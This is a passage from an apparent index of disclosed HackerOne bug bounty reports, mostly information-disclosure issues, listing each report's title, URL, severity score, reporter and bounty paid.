\nhttps://hackerone.com/reports/961929\n#### Severity score\n6.4\n#### Reporter \nsaltymermaid\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nDisclosure of `payment_transactions` for programs via GraphQL query\n#### URL \nhttps://hackerone.com/reports/707433\n#### Severity score\n4.4\n#### Reporter \nmsdian7\n### Bounty paid\n$2,500\n\n\n---\n\n\n### Title\ndoc.owncloud.com: PHP info page disclosure \n#### URL \nhttps://hackerone.com/reports/134216\n#### Severity score\nnull\n#### Reporter \nnullenc0de\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nXSSI: Quick Navigation Interface - leak of private page/post titles\n#### URL \nhttps://hackerone.com/reports/495525\n#### Severity score\nnull\n#### Reporter \nfoobar7\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nTwitter for android is exposing user's location to any installed android app\n#### URL \nhttps://hackerone.com/reports/185862\n#### Severity score\nnull\n#### Reporter \nmishre\n### Bounty paid\n$560\n\n\n---\n\n\n### Title\nGraphQL field on Team node can be used to determine if External Program runs invite-only program\n#### URL \nhttps://hackerone.com/reports/877642\n#### Severity score\nnull\n#### Reporter \nkunal94\n### Bounty paid\n$2,500\n\n\n---\n\n\n### Title\nEmail enumeration at SignUp page\n#### URL \nhttps://hackerone.com/reports/666722\n#### Severity score\nnull\n#### Reporter \nsheerwood\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nInformation disclosure vulnerability on a DoD website\n#### URL \nhttps://hackerone.com/reports/186307\n#### Severity score\nnull\n#### Reporter \nclizsec\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nРаскрытие информации о совершенных операциях\n#### URL \nhttps://hackerone.com/reports/497244\n#### Severity score\nnull\n#### Reporter \nm4l0\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nInformation leakage of private program\n#### URL \nhttps://hackerone.com/reports/159526\n#### Severity score\nnull\n#### Reporter \nfaisalahmed\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nПросмотр любого видео из частной группы и кто загрузил\n#### URL \nhttps://hackerone.com/reports/319674\n#### Severity score\nnull\n#### Reporter \ntrainzment\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nDisclosure of top 10 vulnerability types for programs that haven't enabled the Insights feature\n#### URL \nhttps://hackerone.com/reports/397031\n#### Severity score\nnull\n#### Reporter \ntolo7010\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nAccess Grab_Road BigData Database via Open Presto coordinator\n#### URL \nhttps://hackerone.com/reports/266766\n#### Severity score\nnull\n#### Reporter \nvinothkumar\n### Bounty paid\n$5,000\n\n\n---\n\n\n### Title\n[ssrf] libav vulnerable during conversion of uploaded videos\n#### URL \nhttps://hackerone.com/reports/111269\n#### Severity score\nnull\n#### Reporter \nagarri_fr\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nTwitter Media Studio Source Information Disclosure With Analyst Role\n#### URL \nhttps://hackerone.com/reports/961757\n#### Severity score\nnull\n#### Reporter \ngokay\n### Bounty paid\n$560\n\n\n---\n\n\n### Title\nMonero can leak unitialized memory\n#### URL \nhttps://hackerone.com/reports/481164\n#### Severity score\nnull\n#### Reporter \nguido\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDeny access to download.nextcloud.com + folders\n#### URL \nhttps://hackerone.com/reports/146314\n#### Severity score\nnull\n#### Reporter \nthearmfox\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure of Garbage Collection Cycle 'Again' \n#### URL \nhttps://hackerone.com/reports/1026196\n#### Severity score\nnull\n#### Reporter \nwasjerry\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nImage Injection on `/bully/anniversaryedition` may lead to FB's OAuth Token Theft.\n#### URL \nhttps://hackerone.com/reports/659784\n#### Severity score\nnull\n#### Reporter \nnetfuzzer\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nchange bank account numbers\n#### URL \nhttps://hackerone.com/reports/90805\n#### Severity score\n6.5\n#### Reporter \nwhit537\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPHPinfo page\n#### URL \nhttps://hackerone.com/reports/367050\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCollected Telegraf Matrics Accessible \n#### URL \nhttps://hackerone.com/reports/881733\n#### Severity score\nnull\n#### Reporter \nfrankiexote\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSubdomain Takeover\n#### URL \nhttps://hackerone.com/reports/180393\n#### Severity score\nnull\n#### Reporter \nkholy\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAccess to Splunk at https://apt.ec2.shopify.com:8089\n#### URL \nhttps://hackerone.com/reports/158118\n#### Severity score\nnull\n#### Reporter \nlewerkun\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nInternal usage of AdBlockPlus may expose PoC URLs to unknown third-parties\n#### URL \nhttps://hackerone.com/reports/395518\n#### Severity score\n3.5\n#### Reporter \ndudez\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nweb.xml configuration file disclosure\n#### URL \nhttps://hackerone.com/reports/173972\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nAttacker can extract list of private project's project members\n#### URL \nhttps://hackerone.com/reports/128051\n#### Severity score\nnull\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure\n#### URL \nhttps://hackerone.com/reports/261817\n#### Severity score\nnull\n#### Reporter \ncuso4\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[crossdomain.xml] Dangerous Flash Cross-Domain Policy\n#### URL \nhttps://hackerone.com/reports/105655\n#### Severity score\nnull\n#### Reporter \nzephrfish\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nH1514 Extract information about other sites (new sites) through Affiliate/Referral pages\n#### URL \nhttps://hackerone.com/reports/423506\n#### Severity score\n4.3\n#### Reporter \nrijalrojan\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\ndoc.owncloud.org has missing PHP handler\n#### URL \nhttps://hackerone.com/reports/121382\n#### Severity score\nnull\n#### Reporter \ncjusten\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull Path Disclosure on [smarthistory.khanacademy.org]\n#### URL \nhttps://hackerone.com/reports/6362\n#### Severity score\nnull\n#### Reporter \ngsalazar\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nOpen prod Jenkins instance\n#### URL \nhttps://hackerone.com/reports/231460\n#### Severity score\nnull\n#### Reporter \npreben\n### Bounty paid\n$15,000\n\n\n---\n\n\n### Title\nRequested and received edit access to Google form\n#### URL \nhttps://hackerone.com/reports/130440\n#### Severity score\nnull\n#### Reporter \nsiddiki\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAble to list user's public name, username, phone number, address, facebook ID...\n#### URL \nhttps://hackerone.com/reports/167206\n#### Severity score\nnull\n#### Reporter \nlukeberner\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nView liked twits of private account via publish.twitter.com\n#### URL \nhttps://hackerone.com/reports/174721\n#### Severity score\nnull\n#### Reporter \nkedrisch-4-t\n### Bounty paid\n$1,260\n\n\n---\n\n\n### Title\nReading redacted data via hackbot's answers\n#### URL \nhttps://hackerone.com/reports/247628\n#### Severity score\nnull\n#### Reporter \ninhibitor181\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nPath Disclosure (Info Disclosure) in http://www.localize.io\n#### URL \nhttps://hackerone.com/reports/7903\n#### Severity score\nnull\n#### Reporter \nquistertow\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLocal File Inclusion vulnerability on an Army system allows downloading local files\n#### URL \nhttps://hackerone.com/reports/183978\n#### Severity score\nnull\n#### Reporter \nnahamsec\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nExploiting JSONP callback on /username/charts.json endpoint leads to information disclosure despite user's privacy settings\n#### URL \nhttps://hackerone.com/reports/361951\n#### Severity score\n4.3\n#### Reporter \nkapytein\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nBanner Grabbing - Apache Server Version Disclousure\n#### URL \nhttps://hackerone.com/reports/269449\n#### Severity score\nnull\n#### Reporter \ncybertiger\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure in mmap module - python 2.7.12\n#### URL \nhttps://hackerone.com/reports/174632\n#### Severity score\n3.7\n#### Reporter \naerodudrizzt\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nSmuggle SocialClub's Facebook OAuth Code via Referer Leakage\n#### URL \nhttps://hackerone.com/reports/342709\n#### Severity score\nnull\n#### Reporter \n1hack0\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nInformation Disclosure (phpinfo())\n#### URL \nhttps://hackerone.com/reports/17514\n#### Severity score\nnull\n#### Reporter \nyourdarkshadow\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nwarofdragons.my.games: configuration files with database account are accessible\n#### URL \nhttps://hackerone.com/reports/786609\n#### Severity score\n6.1\n#### Reporter \niframe\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nCustomer's full name disclosure via Shopify Chat (by email lookup)\n#### URL \nhttps://hackerone.com/reports/1018336\n#### Severity score\nnull\n#### Reporter \nfrancisbeaudoin\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nLIsting of http://archive.uber.com/pypi/simple/\n#### URL \nhttps://hackerone.com/reports/125068\n#### Severity score\nnull\n#### Reporter \nbugme\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLabels created in private projects are leaked\n#### URL \nhttps://hackerone.com/reports/132777\n#### Severity score\nnull\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nStaff with no permissions can listen to Shopify Ping conversations by registering to its different WebSocket Events\n#### URL \nhttps://hackerone.com/reports/1023669\n#### Severity score\nnull\n#### Reporter \nfrancisbeaudoin\n### Bounty paid\n$800\n\n\n---\n\n\n### Title\nIncomplete HTML sanitization + Session id leaking + private information disclosure\n#### URL \nhttps://hackerone.com/reports/200487\n#### Severity score\nnull\n#### Reporter \ninhibitor181\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\nPublicly accessible .svn repository - aastraconf.packet8.net\n#### URL \nhttps://hackerone.com/reports/710368\n#### Severity score\nnull\n#### Reporter \nmadrobot\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLeaking sensitive files on Github leads to internal files (python scripts,SQL files)\n#### URL \nhttps://hackerone.com/reports/301831\n#### Severity score\nnull\n#### Reporter \nxsam\n### Bounty paid\n$4,000\n\n\n---\n\n\n### Title\nReport title autocompletion\n#### URL \nhttps://hackerone.com/reports/263\n#### Severity score\nnull\n#### Reporter \njanpaul123\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLog files Leaked In mcsblog.ru\n#### URL \nhttps://hackerone.com/reports/909166\n#### Severity score\n6.1\n#### Reporter \nsniper302\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nWordpress Users Disclosure (/wp-json/wp/v2/users/)\n#### URL \nhttps://hackerone.com/reports/356047\n#### Severity score\n5.3\n#### Reporter \nlegalizenepal\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nInformation Disclosure (FPD) - stopthehacker.com\n#### URL \nhttps://hackerone.com/reports/8780\n#### Severity score\nnull\n#### Reporter \nquistertow\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nRails application running in development mode\n#### URL \nhttps://hackerone.com/reports/518196\n#### Severity score\n0\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPreferred language option fingerprinting issue in Tor Browser\n#### URL \nhttps://hackerone.com/reports/281597\n#### Severity score\nnull\n#### Reporter \nxiaoyinl\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDisclosure of the name of a program that has a private part with an external link\n#### URL \nhttps://hackerone.com/reports/871142\n#### Severity score\n3.4\n#### Reporter \nhaxta4ok00\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\n.git file accessible\n#### URL \nhttps://hackerone.com/reports/686805\n#### Severity score\nnull\n#### Reporter \nnitrozeus0x01\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nhttps://217.69.135.63/rb/: money.mail.ru sources disclosure\n#### URL \nhttps://hackerone.com/reports/13482\n#### Severity score\nnull\n#### Reporter \nisox\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nLeak IP internal\n#### URL \nhttps://hackerone.com/reports/271700\n#### Severity score\nnull\n#### Reporter \nh1danilabs\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nView storyboard of private video @ ht.pornhub.com\n#### URL \nhttps://hackerone.com/reports/138703\n#### Severity score\nnull\n#### Reporter \nkaimi\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nInternal bounty and swag details disclosed as part of JSON response\n#### URL \nhttps://hackerone.com/reports/81083\n#### Severity score\nnull\n#### Reporter \ntechguynoob\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nLeakage badges on disabled user\n#### URL \nhttps://hackerone.com/reports/325594\n#### Severity score\nnull\n#### Reporter \ne333jsjs7se\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nImage Injection Vulnerability on /bully/screens\n#### URL \nhttps://hackerone.com/reports/661646\n#### Severity score\nnull\n#### Reporter \nnetfuzzer\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nInformation disclosure on a DoD website\n#### URL \nhttps://hackerone.com/reports/189414\n#### Severity score\nnull\n#### Reporter \nkhizer47\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nОДМИН ТЭСТ\n#### URL \nhttps://hackerone.com/reports/452016\n#### Severity score\n4\n#### Reporter \nlinkks\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nWordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (UNAUTHORIZED)\n#### URL \nhttps://hackerone.com/reports/696198\n#### Severity score\nnull\n#### Reporter \nj4tayu\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nsource code leak\n#### URL \nhttps://hackerone.com/reports/451077\n#### Severity score\n5.3\n#### Reporter \nlinkks\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nPhishing user to download malicious app could lead to leakage of User Access Token, Email, Name and Profile photo via exported RemoteService\n#### URL \nhttps://hackerone.com/reports/384257\n#### Severity score\nnull\n#### Reporter \nlibcontainer\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nExposed Git Repo at http://fileserver.dropboxbusiness.com\n#### URL \nhttps://hackerone.com/reports/317119\n#### Severity score\nnull\n#### Reporter \ntodayisnew\n### Bounty paid\n$1,024\n\n\n---\n\n\n### Title\nSource Code Disclosure\n#### URL \nhttps://hackerone.com/reports/216336\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPeople who interviewed for HackerOne security analyst position can be enumerated and their personal email address may be exposed\n#### URL \nhttps://hackerone.com/reports/353310\n#### Severity score\n2.9\n#### Reporter \nr3naissance\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nHTML injection and information disclosure in support panel\n#### URL \nhttps://hackerone.com/reports/634312\n#### Severity score\n5.8\n#### Reporter \nxaleraf4ra\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBrowser Self XSS Protection not implemented\n#### URL \nhttps://hackerone.com/reports/400785\n#### Severity score\nnull\n#### Reporter \nallenaleen\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[otus.p.mail.ru] Full Path Disclosure\n#### URL \nhttps://hackerone.com/reports/99262\n#### Severity score\nnull\n#### Reporter \nbigbear_\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure on a DoD website\n#### URL \nhttps://hackerone.com/reports/186317\n#### Severity score\nnull\n#### Reporter \nr0p3\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nVerification of E-Mail address possible on https://biz.yelp.com/login and https://biz.yelp.com/forgot\n#### URL \nhttps://hackerone.com/reports/166265\n#### Severity score\nnull\n#### Reporter \nbadagent\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nGoogle Authenticator0.6 - PHP Version Dosclosure\n#### URL \nhttps://hackerone.com/reports/172609\n#### Severity score\nnull\n#### Reporter \niamsha4yan\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nTeamProfile exposes partially sensitive information through GraphQL\n#### URL \nhttps://hackerone.com/reports/389600\n#### Severity score\n3.8\n#### Reporter \n0619\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nBypass of image rewriting / tracking blocker via srcset\n#### URL \nhttps://hackerone.com/reports/1021885\n#### Severity score\n4.7\n#### Reporter \nfoobar7\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nОткрытая админка Tarantool\n#### URL \nhttps://hackerone.com/reports/914472\n#### Severity score\n6.1\n#### Reporter \n0x01alka\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nXXE in the Connector Designer\n#### URL \nhttps://hackerone.com/reports/112116\n#### Severity score\nnull\n#### Reporter \nagarri_fr\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nInternet-based attacker can run Flash apps in local sandboxes by using special URL schemes (PSIRT-3299, CVE-2015-3079)\n#### URL \nhttps://hackerone.com/reports/73276\n#### Severity score\nnull\n#### Reporter \njouko\n### Bounty paid\n$2,000\n\n\n---\n\n\n### Title\nInsecure Direct Member Disclosure\n#### URL \nhttps://hackerone.com/reports/123501\n#### Severity score\nnull\n#### Reporter \nzuh4n\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure in /skills call\n#### URL \nhttps://hackerone.com/reports/188719\n#### Severity score\n6.5\n#### Reporter \ndeepankerchawla\n### Bounty paid\n$10,000\n\n\n---\n\n\n### Title\nIDOR - Leaking other user's folder names from /appsuite/api/import?action=ICA\n#### URL \nhttps://hackerone.com/reports/199281\n#### Severity score\nnull\n#### Reporter \ninhibitor181\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nPrivate Program all members disclosed \n#### URL \nhttps://hackerone.com/reports/283309\n#### Severity score\nnull\n#### Reporter \nvulnh0lic\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSome store settings/data are accessible to \"No Access\" permission users on GraphQL LiveView operation\n#### URL \nhttps://hackerone.com/reports/409973\n#### Severity score\nnull\n#### Reporter \ntolo7010\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nDisclosure of ways to the site root\n#### URL \nhttps://hackerone.com/reports/129027\n#### Severity score\nnull\n#### Reporter \ncyberunit\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSource Code Disclosure (CGI)\n#### URL \nhttps://hackerone.com/reports/211418\n#### Severity score\n5.3\n#### Reporter \ncyberunit\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nUnrestricted File Download / Path Traversal\n#### URL \nhttps://hackerone.com/reports/183925\n#### Severity score\nnull\n#### Reporter \nziot\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[staging-engineering.gnip.com] Publicly accessible GIT directory\n#### URL \nhttps://hackerone.com/reports/218465\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\n$280\n\n\n---\n\n\n### Title\ndon't expose path of Python \n#### URL \nhttps://hackerone.com/reports/138659\n#### Severity score\nnull\n#### Reporter \ntbehroz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPHP and Web Server version disclosed on leasewebnoc.com\n#### URL \nhttps://hackerone.com/reports/117385\n#### Severity score\nnull\n#### Reporter \nbugs3ra\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[product360.informatica.com] Unauthenticated Apache Tomcat 8 Installation\n#### URL \nhttps://hackerone.com/reports/146436\n#### Severity score\nnull\n#### Reporter \nzephrfish\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nhttps://portal.nextcloud.com/.htaccess file is readable\n#### URL \nhttps://hackerone.com/reports/220946\n#### Severity score\nnull\n#### Reporter \npeeper35\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nsuppress version in Server header on gratipay.com or grtp.co\n#### URL \nhttps://hackerone.com/reports/123742\n#### Severity score\nnull\n#### Reporter \ncaffeine\n### Bounty paid\n$1\n\n\n---\n\n\n### Title\nDiscrepancy in hacker profile report count may reveal existence of a private program by publishing a report\n#### URL \nhttps://hackerone.com/reports/410015\n#### Severity score\n5\n#### Reporter \nhaxta4ok00\n### Bounty paid\n$3,000\n\n\n---\n\n\n### Title\nCross-site information assertion leak via Content Security Policy\n#### URL \nhttps://hackerone.com/reports/16910\n#### Severity score\nnull\n#### Reporter \nzemnmez\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPassword protected rooms total number of viewers disclosure to unauthorized members\n#### URL \nhttps://hackerone.com/reports/411822\n#### Severity score\nnull\n#### Reporter \nbatee5a\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nhttps://concrete5.org ::: HeartBleed Attack (CVE-2014-0160)\n#### URL \nhttps://hackerone.com/reports/6475\n#### Severity score\nnull\n#### Reporter \ng4mm4\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nc2fo.com is releasing sensitive Information about Database Configuration.\n#### URL \nhttps://hackerone.com/reports/6491\n#### Severity score\nnull\n#### Reporter \nexploitprotocol\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nOAuth `redirect_uri` bypass using IDN homograph attack resulting in user's access token leakage\n#### URL \nhttps://hackerone.com/reports/861940\n#### Severity score\n6.4\n#### Reporter \nyassineaboukir\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nDisclose any user's private email through API\n#### URL \nhttps://hackerone.com/reports/196655\n#### Severity score\n4.3\n#### Reporter \nzombiehelp54\n### Bounty paid\n$2,000\n\n\n---\n\n\n### Title\n[H1-2006 2020] H1-2006 CTF Writeup\n#### URL \nhttps://hackerone.com/reports/887611\n#### Severity score\nnull\n#### Reporter \nnytr0gen\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSimple CSS line-height identifies platform\n#### URL \nhttps://hackerone.com/reports/256647\n#### Severity score\nnull\n#### Reporter \nhackerfactor\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nExtremly simple way to bypass Nextcloud-Client PIN/Fingerprint lock\n#### URL \nhttps://hackerone.com/reports/331489\n#### Severity score\n2.1\n#### Reporter \nvolker_weissmann\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nreports.breadcrumb.com is vulnerable for Arbitrary file existence disclosur CVE-2014-7829 \n#### URL \nhttps://hackerone.com/reports/329218\n#### Severity score\nnull\n#### Reporter \ns3curityb3ast\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\nhelp.nextcloud Email Address/Username enumeration\n#### URL \nhttps://hackerone.com/reports/145734\n#### Severity score\nnull\n#### Reporter \njapz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nApache Documentation\n#### URL \nhttps://hackerone.com/reports/8055\n#### Severity score\nnull\n#### Reporter \nnahamsec\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nConfidential issues leaked in public projects when attached to milestone\n#### URL \nhttps://hackerone.com/reports/134300\n#### Severity score\nnull\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nПросмотр приложений любого пользователя / группы\n#### URL \nhttps://hackerone.com/reports/364095\n#### Severity score\nnull\n#### Reporter \ntrainzment\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nServer version disclosure: team.uberinternal.com\n#### URL \nhttps://hackerone.com/reports/146327\n#### Severity score\nnull\n#### Reporter \nbenoculars\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nServer and PHP version Disclosed in Response Header\n#### URL \nhttps://hackerone.com/reports/123194\n#### Severity score\nnull\n#### Reporter \nbugs3ra\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nArbitrary heap overread in strscan on 32 bit Ruby, patch included\n#### URL \nhttps://hackerone.com/reports/166661\n#### Severity score\nnull\n#### Reporter \nguido\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\nDisclosure of 152 cookie names via crafted input\n#### URL \nhttps://hackerone.com/reports/310105\n#### Severity score\nnull\n#### Reporter \nalbinowax\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nExtra program metrics disclosed via /PROGRAM_NAME json response\n#### URL \nhttps://hackerone.com/reports/327088\n#### Severity score\n5\n#### Reporter \nyaworsk\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nAbility to add pishing links in discusion ,\" Bypassing uneductional Links add \"\n#### URL \nhttps://hackerone.com/reports/62301\n#### Severity score\nnull\n#### Reporter \nzeyadk\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nРаскрытие информации о частной группе или приложении\n#### URL \nhttps://hackerone.com/reports/216289\n#### Severity score\nnull\n#### Reporter \ntrainzment\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nUser Information Disclosure via the REST API - /?_method=GET\n#### URL \nhttps://hackerone.com/reports/384782\n#### Severity score\nnull\n#### Reporter \nlovepakistan\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nImage injection /br/games/info may lead to phishing attacks or FB OAuth theft.\n#### URL \nhttps://hackerone.com/reports/510388\n#### Severity score\nnull\n#### Reporter \nnetfuzzer\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nPrivate snippets in public / internal projects leaked though GitLab API\n#### URL \nhttps://hackerone.com/reports/134305\n#### Severity score\nnull\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n\"early preview\" programs disclosure\n#### URL \nhttps://hackerone.com/reports/29185\n#### Severity score\nnull\n#### Reporter \nd4d1a179c0f3\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[otus.p.mail.ru] CRLF Injection\n#### URL \nhttps://hackerone.com/reports/99268\n#### Severity score\nnull\n#### Reporter \nbigbear_\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[https://city-mobil.ru/taxiserv] IDOR leads to information disclosure\n#### URL \nhttps://hackerone.com/reports/746513\n#### Severity score\n3.4\n#### Reporter \nact1on3\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\n[gamesventures.mail.ru] Publicly accessible GIT directory\n#### URL \nhttps://hackerone.com/reports/239481\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nResearch papers on yelp are getting indexed by google bots.\n#### URL \nhttps://hackerone.com/reports/207435\n#### Severity score\nnull\n#### Reporter \nus111\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nTotal bounties paid amount is disclosed because of redesign of the Program Profiles\n#### URL \nhttps://hackerone.com/reports/640488\n#### Severity score\nnull\n#### Reporter \nasad0x01_\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nTRACE disclosure attack may be possible\n#### URL \nhttps://hackerone.com/reports/4409\n#### Severity score\nnull\n#### Reporter \ntechintheprovince\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nFull access to internal Gitlab instances at redash.gitlab.com, dashboards.gitlab.com, prometheus.gitlab.com\n#### URL \nhttps://hackerone.com/reports/498964\n#### Severity score\n10\n#### Reporter \nrijalrojan\n### Bounty paid\n$9,500\n\n\n---\n\n\n### Title\nDisclosure of administrators via JSON on nextcloud.com Wordpress\n#### URL \nhttps://hackerone.com/reports/198012\n#### Severity score\nnull\n#### Reporter \nrbcafe\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nApache2 /icons/ folder accessible\n#### URL \nhttps://hackerone.com/reports/7923\n#### Severity score\nnull\n#### Reporter \nmelvin\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nNginx server version disclosure on engineeringblog\n#### URL \nhttps://hackerone.com/reports/180346\n#### Severity score\nnull\n#### Reporter \njapz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure on rate limit defense mechanism\n#### URL \nhttps://hackerone.com/reports/172296\n#### Severity score\nnull\n#### Reporter \njapz\n### Bounty paid\n$20\n\n\n---\n\n\n### Title\nfull path disclosure on www.rockstargames.com via apache filename brute forcing\n#### URL \nhttps://hackerone.com/reports/210238\n#### Severity score\nnull\n#### Reporter \ngeeknik\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nBlind SSRF on synthetics.newrelic.com\n#### URL \nhttps://hackerone.com/reports/141304\n#### Severity score\nnull\n#### Reporter \nylujion\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCSRF on https://shopify.com/plus\n#### URL \nhttps://hackerone.com/reports/114430\n#### Severity score\nnull\n#### Reporter \nmdv\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nSSRF на element.mail.ru\n#### URL \nhttps://hackerone.com/reports/117158\n#### Severity score\nnull\n#### Reporter \ncyberpunkych\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nReward Money Leakage\n#### URL \nhttps://hackerone.com/reports/149435\n#### Severity score\nnull\n#### Reporter \nxsserboiii\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBack - Refresh - Attack To Obtain User Credentials\n#### URL \nhttps://hackerone.com/reports/21064\n#### Severity score\nnull\n#### Reporter \nxtross1\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBulk UUID enumeration via invite codes\n#### URL \nhttps://hackerone.com/reports/145150\n#### Severity score\nnull\n#### Reporter \nvijay_kumar\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nSource code disclosure on https://107.23.69.180\n#### URL \nhttps://hackerone.com/reports/136891\n#### Severity score\nnull\n#### Reporter \nebrietas\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nUsername Enumeration\n#### URL \nhttps://hackerone.com/reports/667613\n#### Severity score\nnull\n#### Reporter \nahpaleus\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure to \"Permission as auditor\" user\n#### URL 